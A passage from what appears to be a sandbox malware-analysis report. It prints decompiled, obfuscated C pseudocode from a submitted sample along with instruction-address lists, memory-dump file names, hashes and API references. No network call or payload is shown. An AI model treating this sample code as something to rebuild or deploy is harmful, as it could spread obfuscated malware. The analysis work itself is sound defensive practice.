					 *0x1000c83 = 1;
					if((_t106 - _t221 | _t191) != 0) {
						 *0x1000c83 = 0;
					}
					if( *0x1000c84 == 0) {
						 *((short*)(_t223 - 0x24)) = 0x83;
						asm("cdq");
						 *0x1000cc8 = ( *(_t223 - 0x18) & 0x0000ffff) + 0xf;
						_t116 =  *0x1000cd0; // 0x0
						 *0x1000ccc = _t191;
						 *((char*)(_t223 - 5)) =  *((intOrPtr*)(_t223 - 3)) +  *((intOrPtr*)(_t223 - 0x28)) + (_t116 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
						asm("cdq");
						 *((intOrPtr*)(_t223 - 0xa0)) =  *((intOrPtr*)(_t223 - 0xa0)) -  *0x1000cd0 - 0x3811;
						asm("sbb [ebp-0x9c], edx");
					}
					_t76 = _t223 - 0x160; // 0x60f1ba1c
					_t192 = _t76;
					_t77 = _t223 - 0x1ac; // 0x60f1b9d0
					_t109 = _t77;
					MessageBoxW(GetForegroundWindow(), _t109, _t192, 0x10);
					return 0;
				}
			}





































                                              0x00ec6ddc
                                              0x00ec6ddd
                                              0x00ec6dea
                                              0x00ec6dec
                                              0x00ec6ded
                                              0x00ec6dee
                                              0x00ec6df2
                                              0x00ec6df8
                                              0x00ec6df8
                                              0x00ec6dfa
                                              0x00ec6dfd
                                              0x00ec6dff
                                              0x00ec6dff
                                              0x00ec6e01
                                              0x00ec6e01
                                              0x00ec6e01
                                              0x00ec6e03
                                              0x00ec6e04
                                              0x00ec6e08
                                              0x00ec6e0e
                                              0x00ec6e0f
                                              0x00ec6e0f
                                              0x00ec6e12
                                              0x00ec6e17
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e69
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00000000
                                              0x00ec6dd7
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7880
                                              0x00ec7880

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RPSQ8~$pnWr
                                              • API String ID: 0-203735597
                                              • Opcode ID: 31caff341a6828e3d4c3d261cd6528c65218d5521a29a901e1ecbc7eda57eb5e
                                              • Instruction ID: 28e704789919adbbdbd257cafbf2919fc04d1db2ef5e22f4b862a4ba1895677b
                                              • Opcode Fuzzy Hash: 31caff341a6828e3d4c3d261cd6528c65218d5521a29a901e1ecbc7eda57eb5e
                                              • Instruction Fuzzy Hash: 7851F4319042998ACB26CF34D941BFEBBF6FB59300F04806AE4C4E7309DA3A8942CB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00ECC6E4 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E00ECC6E4(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0xfff598);
				E00ECA454(__ebx, __edi, __esi);
				_t28 = E00ECA14E(__ebx, __edx, __edi, _t30);
				_t13 =  *0x1000b14; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E00ECA9AB(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x10004d8; // 0x1000400
					 *((intOrPtr*)(_t29 - 0x1c)) = E00ECC6A6(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E00ECC74E();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00ECA14E(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E00EC921A(_t25, _t26, 0x20);
				}
				return E00ECA499(_t28);
			}







                                              0x00ecc6e4
                                              0x00ecc6e4
                                              0x00ecc6e4
                                              0x00ecc6e4
                                              0x00ecc6e4
                                              0x00ecc6e6
                                              0x00ecc6eb
                                              0x00ecc6f5
                                              0x00ecc6f7
                                              0x00ecc6ff
                                              0x00ecc723
                                              0x00ecc725
                                              0x00ecc72b
                                              0x00ecc72f
                                              0x00ecc732
                                              0x00ecc73d
                                              0x00ecc740
                                              0x00ecc747
                                              0x00ecc701
                                              0x00ecc701
                                              0x00ecc705
                                              0x00000000
                                              0x00ecc707
                                              0x00ecc70c
                                              0x00ecc70c
                                              0x00ecc705
                                              0x00ecc711
                                              0x00ecc715
                                              0x00ecc71a
                                              0x00ecc722

                                              APIs
                                              • __getptd.LIBCMT ref: 00ECC6F0
                                                • Part of subcall function 00ECA14E: __getptd_noexit.LIBCMT ref: 00ECA151
                                                • Part of subcall function 00ECA14E: __amsg_exit.LIBCMT ref: 00ECA15E
                                              • __getptd.LIBCMT ref: 00ECC707
                                              • __amsg_exit.LIBCMT ref: 00ECC715
                                              • __lock.LIBCMT ref: 00ECC725
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                              • String ID:
                                              • API String ID: 3521780317-0
                                              • Opcode ID: d037595420a6bfa7022a22dff62630d459a09848492d7b839ac6ff3b5782c736
                                              • Instruction ID: 2cada0de3071a90b96b0497ccfc6618e984dbed3265a1396fdbb329f0f83bffa
                                              • Opcode Fuzzy Hash: d037595420a6bfa7022a22dff62630d459a09848492d7b839ac6ff3b5782c736
                                              • Instruction Fuzzy Hash: F4F062719407048BD735BB748A06F9872E4AF40754F28612EF458772D2CB7699039F56
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC68A5 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 87%
                                              			E00EC68A5(signed int __esi) {
				intOrPtr _t136;
				signed int _t137;
				void* _t145;
				signed int _t157;
				intOrPtr _t158;
				signed int _t160;
				intOrPtr _t163;
				signed short _t166;
				signed int _t170;
				signed int _t176;
				intOrPtr _t177;
				signed int _t178;
				signed int _t180;
				signed int _t183;
				signed short _t184;
				void* _t186;
				void* _t189;
				void* _t195;
				WCHAR* _t198;
				signed char _t205;
				signed short _t213;
				signed short _t229;
				signed int _t239;
				signed int _t244;
				intOrPtr _t248;
				intOrPtr _t250;
				signed int _t263;
				signed int _t267;
				signed int _t276;
				signed int _t278;
				signed int _t280;
				signed int _t295;
				signed int _t297;
				signed int _t299;
				signed int _t304;
				signed short _t305;
				intOrPtr _t314;
				signed int _t315;
				signed int _t316;
				signed short _t319;
				short _t327;
				signed int _t331;
				intOrPtr _t333;
				signed int _t336;
				signed int _t342;
				signed int _t353;
				WCHAR* _t354;
				signed int _t362;
				signed int _t363;
				signed int _t373;
				signed int _t384;
				signed int _t391;
				signed int _t396;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				void* _t404;
				void* _t420;

				_t398 = __esi;
				do {
					_t244 =  *0x1000cc0; // 0xffff970a
					if((_t244 |  *0x1000cc4) == 0) {
						_t314 =  *((intOrPtr*)(_t404 - 7));
						_t136 = _t314;
						asm("cdq");
						__eflags =  *0x1000cbc - _t314;
						if(__eflags < 0) {
							L7:
							_t137 = 0;
							__eflags = 0;
						} else {
							if(__eflags > 0) {
								L6:
								_t137 = 1;
							} else {
								__eflags =  *0x1000cb8 - _t136;
								if( *0x1000cb8 <= _t136) {
									goto L7;
								} else {
									goto L6;
								}
							}
						}
						__eflags =  !_t137;
						if( !_t137 == 0) {
							__eflags =  *0x1000ce0 |  *0x1000ce4;
							if(( *0x1000ce0 |  *0x1000ce4) != 0) {
								_t384 =  *(_t404 - 0x70) &  *0x1000ce0;
								 *0x1000ce0 = E00ECEE50(_t384, 0 &  *0x1000ce4,  *0x1000ce0,  *0x1000ce4);
								 *0x1000ce4 = _t384;
								 *0x1000cd8 =  *(_t404 - 0x40) * 0xffffe4ed;
								_t239 =  *0x1000d20 & 0xffffb755;
								__eflags = _t239;
								 *(_t404 - 0x5c) = _t239;
							}
						} else {
							 *0x1000c84 =  *0x1000c84 + 1;
						}
					} else {
						 *0x1000c84 = 0x9b;
						 *((char*)(_t404 - 8)) = 1;
					}
					_t315 =  *0x1000d08;
					_t248 =  *0x1000cf4; // 0x2b91c
					asm("cdq");
					_t316 =  *0x1000cf0; // 0xd43579fe
					 *(_t404 - 0xa8) = _t315;
					_t145 = E00ECEE50(_t316, _t248, 0x1faed387, 0);
					asm("sbb edx, edi");
					 *0x1000cf4 = 0;
					 *0x1000cf0 = 1;
					if((_t145 -  !( *(_t404 - 2) ^ _t315) | _t316) != 0) {
						 *0x1000cf0 = 0;
					}
					_t250 =  *0x1000ca4; // 0x9b27
					 *0x1000c90 = 0xb8f675f1 - ( *(_t404 - 1) & 0x000000ff);
					_t319 =  *0x1000cdc; // 0x84521e70
					_t398 = _t398 + 1;
					 *0x1000d10 = ( *(_t404 - 1) & 0x000000ff) *  *(_t404 - 0x6c) * ( *0x1000d08 - (0 | ( *(_t404 - 0x24) & 0x0000ffff) == 0x00000000)) * ((( *0x1000c83 & 0x000000ff) + 1) *  *0x1000cb4 +  !(_t250 + _t319));
					 *(_t404 + _t398 * 2 - 0x1ae) = ( *(_t404 + _t398 - 0xfd) & 0x000000ff) - 0x0000004a & 0x000000ff;
					 *0x1000d14 = 0;
				} while (_t398 < 0xc);
				_t327 = 0x92 - ( *(_t404 - 0xac) ^  *(_t404 - 0xb4));
				_t157 = M01000CB0; // 0x0
				 *((short*)(_t404 - 0x194)) = _t327;
				 *0x1000cc0 = 2;
				 *0x1000cc4 = 0;
				_t158 = E00ECEE50(_t157, 0, 0xbe790e28, 0x61b36);
				 *0x1000d1c = _t327;
				 *0x1000d18 = _t158;
				_t160 =  *0x1000cc0; // 0xffff970a
				_t263 =  *0x1000cc4; // 0xffffffff
				 *0x1000c94 =  *(_t404 - 0x1c) +  *(_t404 - 1) + 1;
				_t331 = _t160 | _t263;
				if(_t331 == 0) {
					_t333 = 1 -  *(_t404 - 0x78);
					asm("sbb eax, ecx");
					_t163 = E00ECEE50(_t333, 0,  *0x1000ca8,  *0x1000cac);
					 *0x1000cac = _t333;
					_t331 =  *0x1000c83 & 0x000000ff;
					M01000CB0 = M01000CB0 ^ _t331;
					__eflags = M01000CB0;
					 *0x1000ca8 = _t163;
				} else {
					if(_t160 != 1 || _t263 != 0) {
						if(_t160 == 2 && _t263 == 0) {
							 *((intOrPtr*)(_t404 - 0xbc)) = 0;
							if( *(_t404 - 0x24) != 0) {
								_t305 = 0;
								__eflags = 0;
							} else {
								_t305 = 1;
							}
							 *((intOrPtr*)(_t404 - 0xbc)) = 0;
							if( *((intOrPtr*)(_t404 - 0xb)) != 0) {
								_t229 = 0;
								__eflags = 0;
							} else {
								_t229 = 1;
							}
							 *(_t404 - 0x18) = ( *(_t404 - 0x78) - _t305) *  *0x1000d10 * _t229;
							asm("cdq");
							asm("sbb esi, edx");
							_t331 =  *(_t404 - 0x48);
							asm("sbb esi, eax");
							 *(_t404 - 0x48) =  *(_t404 - 0x48) -  *((intOrPtr*)(_t404 - 7)) - _t331;
						}
					} else {
						 *0x1000d18 =  *0x1215420;
						 *0x1000d1c = 0;
						 *(_t404 - 2) =  *(_t404 - 2) & 0x000000ff &  *(_t404 - 0x80) & 0x0000ffff |  *(_t404 - 2) & 0x000000ff;
						_t331 =  *0x10ae26c;
						 *0x1000d20 =  *0x1000d20 | _t331;
					}
				}
				 *((char*)(_t404 - 0xdc)) = 0xe5;
				 *((char*)(_t404 - 0xdb)) = 0xdd;
				 *((char*)(_t404 - 0xda)) = 0xe5;
				 *((char*)(_t404 - 0xd9)) = 0xe7;
				 *((char*)(_t404 - 0xd8)) = 0xea;
				 *((char*)(_t404 - 0xd7)) = 0xf1;
				_t166 = E00EC1190() & 0x000000ff;
				 *0x1000cd8 = _t166;
				if(_t166 > 0) {
					asm("cdq");
					 *0x1000d1c = 0;
					asm("adc edx, [0x1000cbc]");
					 *0x1000cc0 =  !(( *0x1000c83 & 0x000000ff) +  *0x1000cb8);
					 *0x1000cc4 =  !_t331;
					 *0x1000d18 =  *0x1215420;
					 *((intOrPtr*)(_t404 - 0x58)) =  *((intOrPtr*)(_t404 - 0x58)) + 1;
					asm("adc [ebp-0x54], ebx");
				}
				_t267 =  *(_t404 - 0x40);
				 *((intOrPtr*)(_t404 - 0x38)) = _t267 + _t267 + _t267 + _t267 + _t267 + _t267 + _t267 + _t267;
				 *(_t404 - 0x34) = ( *(_t404 - 0x3c) << 0x00000020 | _t267) << 3;
				 *0x10ae368 =  *((intOrPtr*)(_t404 - 0x38));
				_t399 = 0;
				do {
					_t336 =  *((intOrPtr*)(_t404 - 0xb));
					_t420 =  *0x1000c9b - _t336; // -28
					if(_t420 >= 0) {
						if( *(_t404 - 1) == 0) {
							_t170 =  *(_t404 - 0x6c);
							_t391 =  *(_t404 - 0x34);
							asm("cdq");
							__eflags = _t170 -  *((intOrPtr*)(_t404 - 0x38));
							if(_t170 !=  *((intOrPtr*)(_t404 - 0x38))) {
								L37:
								 *(_t404 - 0x90) =  *(_t404 - 0x40) +  *0x1000d10 +  *0x1000c84 -  *(_t404 - 1);
								 *(_t404 - 0x2c) =  *(_t404 - 0x2c) - ( *(_t404 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
								 *0x1000ca0 =  *0x1000ca0 +  *(_t404 - 0x7c);
								 *0x1000c9e =  *0x1215420;
								 *0x1000c88 =  *0x1000c88 -  *(_t404 - 0x40);
								asm("sbb [0x1000c8c], eax");
							} else {
								__eflags = _t336 - _t391;
								if(_t336 == _t391) {
									_t297 =  *0x1000c88 |  *0x1000c8c;
									__eflags = _t297;
									 *_t297 =  *_t297 + _t170;
									__eflags =  *_t297;
									if( *_t297 != 0) {
										_t396 =  *(_t404 - 0x74);
										_t176 =  *0x1000c83 & 0x000000ff;
										asm("cdq");
										_t299 =  *(_t404 - 0x78) - _t176;
										__eflags = _t299;
										asm("enter 0xfa1b, 0x8b");
										_push(_t404);
										 *0x3DE8FE44 = _t299;
										 *(_t404 - 0x78) = _t299;
										 *(_t404 - 0x74) = _t396 & _t176;
										 *(_t404 - 0xa) = ( *(_t404 - 0xa) & 0x000000ff) + ( *(_t404 - 0x18) & 0x0000ffff);
										_t177 =  *((intOrPtr*)(_t404 - 4));
										 *0x1000cf0 = 0x73c571ff;
										_t304 = _t177 +  *0x1000cc8 + 1;
										__eflags = _t304;
										 *0x1000cd4 = _t304;
										 *0x1000cf4 = 0;
										_t178 = _t177 + 0x1000cf4;
										__eflags = _t178;
										 *_t304 =  *_t304 + _t178;
										 *_t178 =  *_t178 + _t178;
										 *_t178 =  *_t178 + _t178;
										__eflags =  *_t178;
									}
								} else {
									goto L37;
								}
							}
						} else {
							_t295 =  *0x1000d04; // 0xffffffff
							asm("cdq");
							_t180 =  *0x1000d00; // 0xfffff835
							_t373 = _t336 & _t295;
							 *0x1000d00 = E00ECEE50( *(_t404 - 0x1c) & _t180, _t373, _t180, _t295);
							 *0x1000d04 = _t373;
						}
					}
					 *(_t404 + _t399 * 2 - 0x160) = ( *(_t404 + _t399 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
					_t399 = _t399 + 1;
				} while (_t399 < 6);
				_t276 =  *0x1000d00; // 0xfffff835
				 *0x1000ce0 = 2;
				 *0x1000ce4 = 0;
				 *(_t404 - 0x70) = _t276 * 0x6eb594ba;
				_t278 =  *0x1000ce4; // 0x0
				 *0x110030c =  *(_t404 - 0x60);
				_t183 =  *0x1000ce0; // 0x0
				_t342 = _t183 | _t278;
				if(_t342 == 0) {
					 *((intOrPtr*)(_t404 - 0xbc)) = 0;
					__eflags =  *(_t404 - 6);
					if( *(_t404 - 6) != 0) {
						_t184 = 0;
						__eflags = 0;
					} else {
						_t184 = 1;
					}
					_t280 =  *0x1000d00 + _t184;
					__eflags = _t280;
					 *(_t404 - 0x24) =  !_t280;
				} else {
					if(_t183 != 1 || _t278 != 0) {
						if(_t183 == 2 && _t278 == 0) {
							_t213 =  *0x1000cdc; // 0x84521e70
							 *(_t404 - 0x60) = ( *(_t404 - 0x68) ^ _t213 ^  *0x1000d00) * (_t213 + 0xffffbb58);
							_t362 =  *0x1000c94; // 0x0
							_t363 = _t362 * 0x2d40daef;
							 *(_t404 - 0x7c) =  *(_t404 - 0x7c) * ( *0x1000cec & 0x0000ffff);
							 *(_t404 - 0x90) = _t363;
							asm("cdq");
							 *((intOrPtr*)(_t404 - 0x38)) = ( *(_t404 - 0x84) & 0x0000ffff) + ( *(_t404 - 0x84) & 0x0000ffff) + ( *(_t404 - 0x84) & 0x0000ffff) + ( *(_t404 - 0x84) & 0x0000ffff) + ( *(_t404 - 0x84) & 0x0000ffff) + ( *(_t404 - 0x84) & 0x0000ffff) + ( *(_t404 - 0x84) & 0x0000ffff) + ( *(_t404 - 0x84) & 0x0000ffff);
							 *(_t404 - 0x34) = _t363;
						}
					} else {
						asm("cdq");
						 *0x1000cb8 =  *((intOrPtr*)(_t404 - 4)) - 0x4fef3c23;
						 *0x1000cbc = _t342;
						 *((intOrPtr*)(_t404 - 0x4c)) =  *0x1215420;
						 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
					}
				}
				 *((short*)(_t404 - 0x154)) =  ~(( *(_t404 - 0xc4) +  *((intOrPtr*)(_t404 - 0xa4))) *  *(_t404 - 0xc4) *  *(_t404 - 0x14) ^ 0x0000701c);
				_t186 = 0x20b;
				do {
					 *((char*)(_t404 - 0xb)) =  *((char*)(_t404 - 0xb)) + 1;
					_t186 = _t186 - 1;
				} while (_t186 > 0);
				_t189 = ( *(_t404 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
				 *0x1000c84 = 0;
				if(_t189 != 0) {
					_t400 = 0;
					__eflags = 0;
				} else {
					_t121 = _t189 + 1; // 0x20b
					_t400 = _t121;
				}
				asm("cdq");
				_t353 =  *(_t404 - 0x2c);
				asm("cdq");
				asm("adc edx, [0x1000cc4]");
				_t195 = E00ECEE50(( *(_t404 - 0x18) & 0x0000ffff) + ( *(_t404 - 0xc) & 0x000000ff) + 1,  *(_t404 - 0xc), _t353 +  *0x1000cc0, _t353);
				asm("sbb edx, edi");
				 *0x1000c83 = 1;
				if((_t195 - _t400 | _t353) != 0) {
					 *0x1000c83 = 0;
				}
				if( *0x1000c84 == 0) {
					 *(_t404 - 0x24) = 0x83;
					asm("cdq");
					 *0x1000cc8 = ( *(_t404 - 0x18) & 0x0000ffff) + 0xf;
					_t205 =  *0x1000cd0; // 0x0
					 *0x1000ccc = _t353;
					 *((char*)(_t404 - 5)) =  *((intOrPtr*)(_t404 - 3)) +  *((intOrPtr*)(_t404 - 0x28)) + (_t205 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
					asm("cdq");
					 *((intOrPtr*)(_t404 - 0xa0)) =  *((intOrPtr*)(_t404 - 0xa0)) -  *0x1000cd0 - 0x3811;
					asm("sbb [ebp-0x9c], edx");
				}
				_t134 = _t404 - 0x160; // 0x60f1ba1c
				_t354 = _t134;
				_t135 = _t404 - 0x1ac; // 0x60f1b9d0
				_t198 = _t135;
				MessageBoxW(GetForegroundWindow(), _t198, _t354, 0x10);
				return 0;
			}





























































                                              0x00ec68a5
                                              0x00ec68b0
                                              0x00ec68b0
                                              0x00ec68bc
                                              0x00ec68d1
                                              0x00ec68da
                                              0x00ec68dd
                                              0x00ec68de
                                              0x00ec68e0
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68e2
                                              0x00ec68e2
                                              0x00ec68ee
                                              0x00ec68ee
                                              0x00ec68e4
                                              0x00ec68ea
                                              0x00ec68ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec68ec
                                              0x00ec68e2
                                              0x00ec68f9
                                              0x00ec68fb
                                              0x00ec690a
                                              0x00ec6910
                                              0x00ec6928
                                              0x00ec6931
                                              0x00ec693c
                                              0x00ec694b
                                              0x00ec6956
                                              0x00ec6956
                                              0x00ec695b
                                              0x00ec695b
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68be
                                              0x00ec68be
                                              0x00ec68c8
                                              0x00ec68c8
                                              0x00ec6962
                                              0x00ec696c
                                              0x00ec6976
                                              0x00ec6981
                                              0x00ec6989
                                              0x00ec698f
                                              0x00ec699c
                                              0x00ec69a2
                                              0x00ec69a8
                                              0x00ec69b2
                                              0x00ec69b4
                                              0x00ec69b4
                                              0x00ec69d7
                                              0x00ec69dd
                                              0x00ec69e3
                                              0x00ec6a02
                                              0x00ec6a20
                                              0x00ec6a35
                                              0x00ec6a3d
                                              0x00ec6a3d
                                              0x00ec6a66
                                              0x00ec6a68
                                              0x00ec6a6f
                                              0x00ec6a76
                                              0x00ec6a80
                                              0x00ec6a86
                                              0x00ec6a8f
                                              0x00ec6a95
                                              0x00ec6aa3
                                              0x00ec6aac
                                              0x00ec6ab2
                                              0x00ec6aba
                                              0x00ec6abc
                                              0x00ec6b8a
                                              0x00ec6b91
                                              0x00ec6ba3
                                              0x00ec6ba8
                                              0x00ec6bae
                                              0x00ec6bb5
                                              0x00ec6bb5
                                              0x00ec6bbb
                                              0x00ec6ac2
                                              0x00ec6ac5
                                              0x00ec6ace
                                              0x00ec6ae0
                                              0x00ec6ae9
                                              0x00ec6af2
                                              0x00ec6af2
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6af7
                                              0x00ec6aff
                                              0x00ec6b08
                                              0x00ec6b08
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b1f
                                              0x00ec6b2f
                                              0x00ec6b32
                                              0x00ec6b34
                                              0x00ec6b3c
                                              0x00ec6b3e
                                              0x00ec6b41
                                              0x00ec6b49
                                              0x00ec6b57
                                              0x00ec6b65
                                              0x00ec6b6b
                                              0x00ec6b6e
                                              0x00ec6b76
                                              0x00ec6b76
                                              0x00ec6ac5
                                              0x00ec6bc2
                                              0x00ec6bc8
                                              0x00ec6bcf
                                              0x00ec6bd5
                                              0x00ec6bdc
                                              0x00ec6be3
                                              0x00ec6bef
                                              0x00ec6bf6
                                              0x00ec6bfc
                                              0x00ec6c05
                                              0x00ec6c0c
                                              0x00ec6c12
                                              0x00ec6c1a
                                              0x00ec6c26
                                              0x00ec6c2c
                                              0x00ec6c31
                                              0x00ec6c35
                                              0x00ec6c35
                                              0x00ec6c38
                                              0x00ec6c48
                                              0x00ec6c4b
                                              0x00ec6c54
                                              0x00ec6c59
                                              0x00ec6c60
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e66
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
